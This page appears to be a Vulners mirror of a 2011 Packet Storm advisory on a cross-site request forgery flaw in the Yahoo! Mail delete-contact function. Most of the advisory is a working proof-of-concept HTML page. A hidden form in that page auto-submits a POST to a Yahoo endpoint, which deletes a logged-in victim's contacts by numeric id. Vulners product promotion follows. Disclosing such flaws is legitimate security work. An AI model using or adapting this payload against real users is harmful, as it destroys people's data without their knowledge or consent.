Lucene search
K

Yahoo! Mail Cross Site Request Forgery

🗓️ 04 Dec 2011 00:00:00Reported by Pratul AgrawalType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 26 Views

Yahoo! Mail CSRF Vulnerability in Delete Contact Modul

Code
` =======================================================================  
  
YAHOOMAIL CSRF Vulnerability  
  
=======================================================================  
  
  
  
# Vulnerability found in- Yahoomail Delete Contact module  
  
# email [email protected]  
  
# company AKS IT Services Pvt. Ltd  
  
# Credit by Prakar Agrawal  
  
# Email Service Yahoomail   
  
# Category Mail service  
  
# Site p4ge http://www.yahoomail.com  
  
# Plateform java  
  
  
# Proof of concept #  
  
Targeted URL: http://address.mail.yahoo.com/  
  
  
Script to Delete the contacts from contact list through Cross Site request forgery  
  
. ................................................................................................................  
  
<html>  
<body>  
<form name="csrf" action="http://us.mg5.mail.yahoo.com/yab-fe/mu/DeleteContact.json?" method="POST">  
<input type=hidden name="action" value="delete_contacts">  
<input type=hidden name="id" value="$Numeric No.$">  
</form>  
<script>document.csrf.submit();</script>  
</body>  
</html>  
  
  
. ..................................................................................................................  
  
Put any Numeric No. (i.e 1,2,3,4 etc) in id field parameter and try to forge the functionality. its working.....  
  
# If you have any questions, comments, or concerns, feel free to contact me.  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation